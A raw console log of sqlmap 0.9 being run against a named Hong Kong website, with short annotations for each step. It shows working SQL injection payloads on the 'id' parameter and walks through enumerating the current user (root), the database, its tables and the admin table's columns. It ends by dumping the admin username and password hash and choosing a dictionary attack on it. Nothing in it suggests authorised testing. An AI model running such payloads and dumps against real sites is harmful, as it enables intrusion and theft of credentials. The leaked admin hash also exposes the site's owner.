D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* note: get the current user name

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of those columns

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>